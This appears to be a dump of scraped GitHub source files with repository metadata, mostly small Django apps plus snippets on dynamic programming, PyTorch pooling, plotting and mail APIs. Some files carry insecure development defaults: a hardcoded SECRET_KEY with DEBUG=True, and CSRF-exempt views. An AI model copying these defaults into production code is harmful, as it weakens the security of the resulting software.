result = ItemUser.objects.get(Item=itemdb)
except :
result = ItemUser.objects.create()
result.Item.add(itemdb)
result.Private = private
result.save()
question.Items.add(result)
question.save()
threadengine = ThreadEngine.objects.create()
threadengine.Question.add(question)
threadengine.save()
sendnotification(question,threadengine)
| [
"[email protected]"
] | |
68a6ad72b6ba110b69031ee89e2ee46750bbdae1 | 74be41563cba82ec784aed3c893a53261a428ab1 | /myapp/ocr_api/views.py | db6910d7ae1c32dea6bf6323e19f1305a4a8f71f | [] | no_license | Bakushin10/Django | e06ad485084d917886a50e5f3c38f8b049c85fb1 | 184db43f58e4679c2a556f9603f5e3bec61da1eb | refs/heads/master | 2022-12-12T13:34:24.391273 | 2019-11-05T14:33:29 | 2019-11-05T14:33:29 | 202,837,195 | 0 | 0 | null | 2022-12-08T06:53:31 | 2019-08-17T04:55:27 | Python | UTF-8 | Python | false | false | 5,626 | py | import os, sys, json
from PIL import Image, ImageDraw2
from django.shortcuts import render
from django.shortcuts import render, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from ocr_api.models import OCRInputModel, JsonOCRInputModel
from ocr_api.serializers import OCRInputModelSerializer, JsonOCRInputModelSerializer
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def post_dummy_data(request):
"""
basic API call for a POST method
it will post dummy data
based on the OCRInputModel defined ocr_api.models
"""
if request.method == "POST":
data = {"ocrJson" : "Two"}
serializer = OCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("success: {} was created".format(data))
@csrf_exempt
def post_ocr_results(request):
"""
**** Please dont call this API if data is alrady stored at endpoint ****
demo API POST call for OCR result.
read a Json from a local file and post it to endpoint.
"""
if request.method == "POST":
response = readJson()
print("{} {} {}".format("*"*10, "tatal amount of data : ", len(response["response"])))
print("{} {}".format("*"*10, request))
for json_data in response["response"]:
# print(json_data)
x , y = [], []
for coordinate in json_data["coordinates"]:
x.append(coordinate["y"])
y.append(coordinate["x"])
data = {
"field" : str(json_data["field"]),
"hasField" : json_data["hasField"],
"coordinates" : str(json_data["coordinates"]),
"x_coordinates" : str(x),
"y_coordinates" : str(y),
"text" : json_data["text"]
}
serializer = JsonOCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("{} {} {}".format("All ", len(response["response"]), " data posted!"))
@csrf_exempt
def get_ocr_results(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe = False)
@csrf_exempt
def get_ocr_results_by_id(request, username):
"""
retrieve fake OCR data by id
"""
if request.method != "GET":
return HttpResponse("GET request only")
data = JsonOCRInputModel.objects.filter(field=username)
if len(data) == 0:
return HttpResponse("no data found")
return HttpResponse(data.values())
@csrf_exempt
def get_ocred_image(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
SUCCESS_MESSAGE = {"image successfully ocred": "OK"}
ERROR_MESSAGE = {"image could not be ocred": "ERROR"}
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
imagePath = "ocr_api/img/"
imageName = "sample.jpg"
try:
drawLinesOnImages(imagePath, imageName, serializer.data)
except:
return JsonResponse(ERROR_MESSAGE, safe = False)
return JsonResponse(SUCCESS_MESSAGE, safe = False)
@csrf_exempt
def get_dummy_data(request):
"""
basic API call for a GET method
"""
data = OCRInputModel.objects.all()
if request.method == "GET":
serializer = OCRInputModelSerializer(data, many=True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe=False)
def readJson():
"""
read JSON data from local file
"""
#path = "ocr_api/json/test.json"
path = "ocr_api/json/ocrReturnValues.json"
#return ""
with open(os.path.join(sys.path[0], path)) as f:
data = json.load(f)
print("{} {}".format("*"*10, data["response"]))
return data
def getDataToDisplay(data):
"""
add "total amount amount of data" for readability purposes
"""
return ["total amount data : " + str(len(data))] + data
def drawLinesOnImages(imagePath, imageName, data):
detectTextOnImage(imagePath, imageName, data)
# detectTextBoxOnImage(imagePath)
def detectTextOnImage(imagePath,imageName, data):
"""
draw line to the image based on the x and y coordinates from JSON
"""
im = Image.open(imagePath + imageName)
d = ImageDraw2.Draw(im)
pen = ImageDraw2.Pen(color="red")
for j in data:
x = j["x_coordinates"].replace("[","").replace("]","").split(",")
y = j["y_coordinates"].replace("[","").replace("]","").split(",")
#LB, LT, RT, RB = (c[0]["x"], c[0]["y"]), (c[1]["x"], c[1]["y"]), (c[2]["x"], c[2]["y"]), (c[3]["x"], c[3]["y"])
LB, LT, RT, RB = (int(y[0]), int(x[0])), (int(y[1]), int(x[1])), (int(y[2]), int(x[2])), (int(y[3]), int(x[3]))
d.line([LB, LT, RT, RB, LB], pen) #red line
im.save(imagePath + "ocred_" + imageName)
print("image saved")
def detectTextBoxOnImage():
"""
detect the textbox on a policy
"""
pass | [
"[email protected]"
] | |
b1f831dc5b99ada2504bfeae16902b81d431db0e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03470/s172972650.py | 57f94dcf85afe314754def063304ba328d8d9803 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | N = int(input())
d = sorted([int(input()) for i in range(N)])
ans = 1
for i in range(N-1):
if d[i] < d[i+1]:
ans += 1
print(ans) | [
"[email protected]"
] | |
be170dcc3bdd5793fcc52084d7dd6184d1ea3928 | 51aa2894c317f60726fe9a778999eb7851b6be3e | /120_design_patterns/014_command/_exercises/templates/4-Command Pattern/Assignment/Solution/security_commands.py | dccb3920efff4cf8a244e3bb8df5cf9715871ec1 | [] | no_license | pranaymate/Python_Topics | dd7b288ab0f5bbee71d57080179d6481aae17304 | 33d29e0a5bf4cde104f9c7f0693cf9897f3f2101 | refs/heads/master | 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | # ____ a__.s... ______ S..
# ____ c_a.. ______ AC..
#
#
# c_ SecurityArmCommand AC..
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s____.a..
#
# ___ undo(
# s___.di..
#
#
# c_ SecurityDisarmCommand(AbsCommand):
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s___.di..
#
# ___ undo
# s___.a.. | [
"[email protected]"
] | |
76b7b7fd8b8e98790d7b81290bc4cc77bea998c9 | a74a592d3e34c0cb2e19363a92410c520dc0ecda | /backend/course/models.py | 1ed6ffe755403a8dcb6cbf4e3dc54d87f002688f | [] | no_license | crowdbotics-apps/youthbuild-course-a-18675 | 5e4f0231b6127b215576c87593b8a073518200de | 4f17bfa2f588be23f24d862ca86fba569908e90e | refs/heads/master | 2022-11-08T20:55:36.094513 | 2020-07-07T19:33:25 | 2020-07-07T19:33:25 | 277,903,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,850 | py | from django.conf import settings
from django.db import models
class Course(models.Model):
"Generated Model"
author = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="course_author",
)
title = models.CharField(null=True, blank=True, max_length=256,)
description = models.TextField(null=True, blank=True,)
categories = models.ManyToManyField(
"course.Category", blank=True, related_name="course_categories",
)
class Lesson(models.Model):
"Generated Model"
module = models.ForeignKey(
"course.Module", on_delete=models.CASCADE, related_name="lesson_module",
)
title = models.CharField(max_length=256,)
description = models.TextField()
media = models.URLField()
class Category(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Enrollment(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="enrollment_user",
)
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="enrollment_course",
)
class Event(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="event_user",
)
date = models.DateTimeField()
class Module(models.Model):
"Generated Model"
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="module_course",
)
title = models.CharField(max_length=256,)
description = models.TextField()
class SubscriptionType(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Recording(models.Model):
"Generated Model"
event = models.ForeignKey(
"course.Event", on_delete=models.CASCADE, related_name="recording_event",
)
media = models.URLField()
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="recording_user",
)
published = models.DateTimeField()
class Group(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Subscription(models.Model):
"Generated Model"
subscription_type = models.ForeignKey(
"course.SubscriptionType",
on_delete=models.CASCADE,
related_name="subscription_subscription_type",
)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="subscription_user",
)
class PaymentMethod(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="paymentmethod_user",
)
primary = models.BooleanField()
token = models.CharField(max_length=256,)
# Create your models here.
| [
"[email protected]"
] | |
a3b0628f021f81f748f640274f9ddface28f23ea | 500b03fa6cb776c1d51db4a3a3aa252ddf5a50e6 | /book_exercise/py_intro/basics/Chapter 4: If statement/num_close.py | d5a70064327dbf0d92c9c632d600f35af5edadad | [] | no_license | carloslvm/learning-python | b3796a0a5b751baae8c551a9f6fe262f98980691 | 07f885454cf21b7d215a58da7fcb907715e546bd | refs/heads/master | 2022-07-27T21:39:11.937801 | 2022-07-09T17:47:56 | 2022-07-09T17:47:56 | 163,447,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | #!/usr/bin/python3
# Guessing a float number
num = 10.000
user_num = float(input('Try to guess the float number: '))
if user_num == 10.001 or user_num == 9.999:
print('You were close.')
elif user_num != 10.001 and user_num != 9.999:
print('You were not close.')
elif user_num == num:
print('That\'s correct.')
else:
print('You were no close.')
| [
"[email protected]"
] | |
677767ca7ceb624e8d26a88b9ec1aea211c9eb4c | 29f5b2d3a3582afad36ce03d23ac8e25743c7a1d | /quickstart.py | 4e6bea7265daf75d13f0f31247acd9327aebbe9f | [] | no_license | kylinRao/djangowebbuild | 9b1e1f32ae8b8872e950ff91658296d92113597e | 75a06b8e35d50176d824e3a4e790a79796c28f70 | refs/heads/master | 2021-01-19T04:32:49.411920 | 2016-06-08T01:33:38 | 2016-06-08T01:33:38 | 60,658,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,301 | py | from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/gmail-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/gmail.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'gmail-python-quickstart.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def main():
"""Shows basic usage of the Gmail API.
Creates a Gmail API service object and outputs a list of label names
of the user's Gmail account.
"""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0006232e66e9b267c54344acf505f520ca34f480 | 0adf94fc39a02018165b62e93dd83edddd041230 | /.history/configurations/settings_20190226153809.py | 75cf74155e05e00a2fbe0afc31d36aded4447481 | [] | no_license | SabitDeepto/BrJobs | 1e3baa143331cf46b9c70911c6644d1efd4fffd6 | 1a458c8c667f8093a2325d963e5542655467c7aa | refs/heads/master | 2020-04-24T08:02:26.350007 | 2019-03-17T05:53:30 | 2019-03-17T05:53:30 | 171,818,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,011 | py | """
Django settings for configurations project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+nu9r@lhaog&+yl!%vwmk1a-xed5!2ml&pm=n(t)(!8bed$^ny'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Test',
'Jobs',
'ckeditor',
'ckeditor_uploader',
'register',
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# ...
'debug_toolbar.middleware.DebugToolbarMiddleware',
# ...
]
ROOT_URLCONF = 'configurations.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'configurations.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
# AUTH_PASSWORD_VALIDATORS = [
# {
# 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
# },
# ]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
#...
SITE_ID = 1
####################################
## CKEDITOR CONFIGURATION ##
####################################
CKEDITOR_JQUERY_URL = 'https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js'
CKEDITOR_UPLOAD_PATH = 'uploads/'
CKEDITOR_IMAGE_BACKEND = "pillow"
CKEDITOR_CONFIGS = {
'default': {
'toolbar': None,
},
}
###################################
# AUTH_USER_MODEL = 'Test.User'
# AUTH_USER_MODEL = 'TestApp.User'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/'
# AUTH_USER_MODEL = 'Jobs.User' | [
"[email protected]"
] | |
8bbe10ec9f9d538ff2af58beaee2fe77b23096dc | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/educative.io/medium-dp/longest-common-subsequence/11_edit_distance.py | 0afe28a66ab6ed5f3dc9fc015d21e758fbb667d4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | def find_min_operations(s1, s2):
return find_min_operations_recursive(s1, s2, 0, 0)
def find_min_operations_dp(s1, s2):
n1, n2 = len(s1), len(s2)
dp = [[-1 for _ in range(n2 + 1)] for _ in range(n1 + 1)]
# if s2 is empty, we can remove all the characters of s1 to make it empty too
for i1 in range(n1 + 1):
dp[i1][0] = i1
# if s1 is empty, we have to insert all the characters of s2
for i2 in range(n2 + 1):
dp[0][i2] = i2
for i1 in range(1, n1 + 1):
for i2 in range(1, n2 + 1):
# If the strings have a matching character, we can recursively match for the remaining lengths
if s1[i1 - 1] == s2[i2 - 1]:
dp[i1][i2] = dp[i1 - 1][i2 - 1]
else:
dp[i1][i2] = 1 + min(dp[i1 - 1][i2], # delete
min(dp[i1][i2 - 1], # insert
dp[i1 - 1][i2 - 1])) # replace
return dp[n1][n2]
def find_min_operations_recursive(s1, s2, i1, i2):
n1, n2 = len(s1), len(s2)
# if we have reached the end of s1, then we have to insert all the remaining characters of s2
if i1 == n1:
return n2 - i2
# if we have reached the end of s2, then we have to delete all the remaining characters of s1
if i2 == n2:
return n1 - i1
# If the strings have a matching character, we can recursively match for the remaining lengths
if s1[i1] == s2[i2]:
return find_min_operations_recursive(s1, s2, i1 + 1, i2 + 1)
# perform deletion
c1 = 1 + find_min_operations_recursive(s1, s2, i1 + 1, i2)
# perform insertion
c2 = 1 + find_min_operations_recursive(s1, s2, i1, i2 + 1)
# perform replacement
c3 = 1 + find_min_operations_recursive(s1, s2, i1 + 1, i2 + 1)
return min(c1, min(c2, c3))
def main():
print(find_min_operations("bat", "but"))
print(find_min_operations("abdca", "cbda"))
print(find_min_operations("passpot", "ppsspqrt"))
main()
| [
"[email protected]"
] | |
b532081aaa769fc56e4142beaeafe9cc3c22fc13 | ff4ab3a8aac4d26534d1d980f85f7b4ca3e0905b | /config.py | b909dff713e1be51064f9d8b0ab0d5244ecb1a54 | [] | no_license | pandeynandancse/Named_Entity_Reognition_BERT | be19db084079d035a59356cdf6ede8153f856055 | a6205240d312f6ca02b3ef5c8cc34512126815f0 | refs/heads/master | 2022-11-29T09:33:32.747433 | 2020-08-11T15:54:51 | 2020-08-11T15:54:51 | 286,786,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import transformers
MAX_LEN = 128
TRAIN_BATCH_SIZE = 32
VALID_BATCH_SIZE = 8
EPOCHS = 10
BASE_MODEL_PATH = "../input/bert_base_uncased"
MODEL_PATH = "model.bin"
TRAINING_FILE = "../input/ner_dataset.csv"
#also can grab tokenizer from tokenizers library that is also from hugging face
TOKENIZER = transformers.BertTokenizer.from_pretrained(
BASE_MODEL_PATH,
do_lower_case=True # set to true becoz we are using bert uncased
)
| [
"[email protected]"
] | |
1d92cd4caf466194bc8dd0b7e0808a2f847ca1c2 | 093781f6a182c4988bb72c518e9747b723528e65 | /14_pooling.py | dc3c8a0f6d26c083f847ea87a72901437bc557b4 | [] | no_license | cjy02044027/quincy-pytorch | 889d821685865687853df8c080352e534ac71b0d | c6a226196ec3d7d23121291c3b5696ea57152f57 | refs/heads/master | 2023-01-12T10:46:39.394664 | 2020-02-14T06:23:10 | 2020-02-14T06:23:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | #!usr/bin/env python
# -*- coding:utf-8 _*-
"""
@version:
author:yanqiang
@time: 2019/04/09
@file: main.py
@description: 最大池化和平均池化
"""
import torch
from torch import nn
print(torch.__version__)
# 二维最大池化层和平均池化层
def pool2d(X, pool_size, mode='max'):
"""
池化层
:param X:
:param pool_size:
:param mode: max 最大池化 avg平均池化
:return:
"""
X = X.float()
p_h, p_w = pool_size
Y = torch.zeros(X.shape[0] - p_h + 1, X.shape[1] - p_w + 1)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
if mode == 'max':
Y[i, j] = X[i:i + p_h, j:j + p_w].max()
elif mode == 'avg':
Y[i, j] = X[i:i + p_h, j:j + p_w].mean()
return Y
X = torch.tensor([[0, 1, 2], [3, 4, 5], [6, 7, 8]])
print(pool2d(X, (2, 2)))
print(pool2d(X, (2, 2), 'avg'))
# 填充和步幅
X = torch.arange(16, dtype=torch.float).view((1, 1, 4, 4))
pool2d = nn.MaxPool2d(3)
print(pool2d(X))
pool2d = nn.MaxPool2d(3, padding=1, stride=2)
print(pool2d(X))
pool2d = nn.MaxPool2d((2, 4), padding=(1, 2), stride=(2, 3))
print(pool2d(X))
# 多通道
X = torch.cat((X, X + 1), dim=1)
print(X)
print(X.shape)
pool2d = nn.MaxPool2d(3, padding=1, stride=2)
print(pool2d(X))
| [
"[email protected]"
] | |
f3a07f02268fdfe27b330e612e8b7945659aa549 | 77c7c1bb838fe3c7972e1fd54aab21ce50da0654 | /bhp045/apps/cancer_subject/models/subject_off_study_mixin.py | 5d0ff6fbd5c6fd21124adcf8aafec5f26650affd | [] | no_license | botswana-harvard/cancer | 394124fe4cb8ae5e03ca70842a13e20220201be9 | 410cdd637d1da5b9d5081da02697eb1d03ae0984 | refs/heads/master | 2021-01-21T18:24:58.316116 | 2017-05-22T13:11:05 | 2017-05-22T13:11:05 | 92,045,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from edc.subject.off_study.mixins.off_study_mixin import OffStudyMixin
class SubjectOffStudyMixin(OffStudyMixin):
def get_off_study_cls(self):
from .subject_off_study import SubjectOffStudy
return SubjectOffStudy
| [
"[email protected]"
] | |
6abde58c2c7813da0693cc6347cd6916351e7fd8 | 4c2def4621865535d36e6beb605691a6d53628d4 | /ask_weather/action.py | af6d79fd48a1e8ad45ce006213b73d645d5dcce1 | [] | no_license | liaozhihui/work | 4485722c73a796c25896bb083d84d0e4f79e05c5 | 61a11d591875e17818b1b303d3552818441efafc | refs/heads/master | 2020-07-16T17:04:07.788674 | 2019-09-02T10:13:28 | 2019-09-02T10:13:28 | 205,828,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from rasa_core_sdk import Action
from rasa_core_sdk.events import SlotSet
class ActionAskWeather(Action):
def name(self):
return 'action_ask_weather'
def run(self, dispatcher, tracker, domain):
dispatcher.utter_message(f'您问的天气地点是哪里呢')
return [SlotSet('city', '深圳')]
| [
"[email protected]"
] | |
c212b7abfa204151fd7118f9c1047b5c3fb541c4 | a9d4beb507b284e0a30b6f6522d448bec37ab7d6 | /math/0x01-plotting/5-all_in_one.py | c1616e1f02491a0cca18080e0f79cb2b3375c8b4 | [] | no_license | Danucas/holbertonschool-machine_learning | b9aedaccb93627adb9514f6c2fae1b67a1aeb0af | 83e6185ebe3935f4fea27afa5db9f448722f2e2a | refs/heads/main | 2023-07-12T17:08:02.813748 | 2021-08-17T05:22:30 | 2021-08-17T05:22:30 | 318,015,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,830 | py | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
y0 = np.arange(0, 11) ** 3
mean = [69, 0]
cov = [[15, 8], [8, 15]]
np.random.seed(5)
x1, y1 = np.random.multivariate_normal(mean, cov, 2000).T
y1 += 180
x2 = np.arange(0, 28651, 5730)
r2 = np.log(0.5)
t2 = 5730
y2 = np.exp((r2 / t2) * x2)
x3 = np.arange(0, 21000, 1000)
r3 = np.log(0.5)
t31 = 5730
t32 = 1600
y31 = np.exp((r3 / t31) * x3)
y32 = np.exp((r3 / t32) * x3)
np.random.seed(5)
student_grades = np.random.normal(68, 15, 50)
parameters = {
'axes.labelsize': 'x-small',
'axes.titlesize': 'x-small'
}
plt.rcParams.update(parameters)
fig = plt.figure()
ax1 = plt.subplot2grid((3, 2), (0, 0), colspan=1)
# adding ax 1
ax1.set_xlim(0, 10)
ax1.plot(y0)
# adding ax 2
ax2 = plt.subplot2grid((3, 2), (0, 1), colspan=1)
ax2.title.set_text("Men's Height vs Weight")
ax2.scatter(x1, y1, c=['#d065cb'])
ax3 = plt.subplot2grid((3, 2), (1, 0), colspan=1)
# adding ax 3
ax3.set_xlabel('Fraction Remaining')
ax3.set_ylabel('Time (years)')
ax3.set_yscale('log')
ax3.set_xlim(0, 28650)
ax3.plot(x2, y2)
# adding ax 4
ax4 = plt.subplot2grid((3, 2), (1, 1), colspan=1)
ax4.title.set_text('Exponential Decay of Radioactive Elements')
ax4.set_xlim(0, 20000)
ax4.set_ylim(0, 1)
line1, = ax4.plot(x3, y31, color="#eb473f", label="C-14", linestyle="dashed")
line2, = ax4.plot(x3, y32, color="#4f9720", label="Ra-226")
ax4.legend((line1, line2), (line1.get_label(), line2.get_label()))
# adding ax 5
ax5 = plt.subplot2grid((3, 2), (2, 0), colspan=2)
ax5.title.set_text('Project A')
ax5.set_xlabel('Grades')
ax5.set_xlabel('Number of students')
ax5.set_xlim(0, 100)
ax5.set_ylim(0, 30)
ax5.hist(student_grades, range=(0, 100), bins=10, edgecolor='black', linewidth=1.2)
for ax in fig.axes:
print(ax)
fig.suptitle('All in one')
fig.tight_layout()
plt.show()
| [
"[email protected]"
] | |
d20d0862c0bc14f8a343819a18037592d6950392 | 734a31e81f206c0bb9ab1e1fd6745a29aaa10b14 | /src/products/migrations/0015_auto_20180115_0209.py | 86f87585cdc543286771d23aa9edee108ffaf53d | [
"MIT"
] | permissive | shan18/Kart | d39974ba3f2eca14e68f6e51ed9132ffcf8a540a | a38f648d00b829a2f0a875e78c102c62c9718ee1 | refs/heads/master | 2022-12-10T05:33:41.198309 | 2022-11-29T07:16:32 | 2022-11-29T07:16:32 | 118,975,709 | 26 | 18 | MIT | 2020-06-08T09:47:11 | 2018-01-25T22:34:36 | Python | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-14 20:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0014_auto_20180114_0359'),
]
operations = [
migrations.AddField(
model_name='productfile',
name='free',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='productfile',
name='user_required',
field=models.BooleanField(default=False),
),
]
| [
"[email protected]"
] | |
8b363f046499487518a67cb87eb0ec039c027f5f | 025333407ea7219540c4873091ade8bff9ced829 | /manage.py | f2211cdbdecf378c6af5618fe89fcac935d26090 | [] | no_license | PyconUK/ironcage18 | 317b6250019f0173c421b0f1980dcee52c727528 | 4ffb1c8449437f8d4dc08a1f344d47383b542598 | refs/heads/master | 2021-04-15T18:24:30.180384 | 2019-05-15T08:48:57 | 2019-05-15T08:57:20 | 126,659,139 | 1 | 4 | null | 2018-10-10T07:38:22 | 2018-03-25T02:53:05 | Python | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
import os
import sys
import dotenv
if __name__ == "__main__":
if 'test' in sys.argv:
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ironcage.settings.test")
else:
dotenv.read_dotenv()
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ironcage.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
31ab032e54bf47596e702e42e35b49e5afb56914 | dbd87fe6e9466c4cada18b037667cfdddc62c193 | /data/Quandl/Quandl_to_Email/mailer.py | fc9f7c8bf40471494b8853214d35944ab0aff2b3 | [] | no_license | alexanu/Python_Trading_Snippets | 74515a40dc63ba50d95bd50330ed05d59b5dc837 | 85969e681b9c74e24e60cc524a952f9585ea9ce9 | refs/heads/main | 2023-06-25T03:27:45.813987 | 2023-06-09T16:09:43 | 2023-06-09T16:09:43 | 197,401,560 | 18 | 17 | null | 2023-02-08T22:25:25 | 2019-07-17T14:05:32 | Jupyter Notebook | UTF-8 | Python | false | false | 1,112 | py | import sendgrid
import os
from sendgrid.helpers.mail import Email, Content, Mail
class Mailer(object):
def __init__(self):
if os.environ["SENDGRID_API_KEY"] is None:
raise EnvironmentError("Missing env SENDGRID_API_KEY")
self.sendgrid_client = sendgrid.SendGridAPIClient(
apikey=os.environ["SENDGRID_API_KEY"])
def send_mail(self, from_address, to_address, subject, body, content_type="text/plain"):
from_email = Email(from_address)
to_email = Email(to_address)
subject = subject
content = Content(content_type, body)
mail = Mail(from_email, subject, to_email, content)
response = self.sendgrid_client.client.mail.send.post(
request_body=mail.get())
return response
if __name__ == '__main__':
mailer = Mailer()
response = mailer.send_mail(
from_address="[email protected]",
to_address="[email protected]",
subject="Subject - Test mail",
body="Test mail ABC")
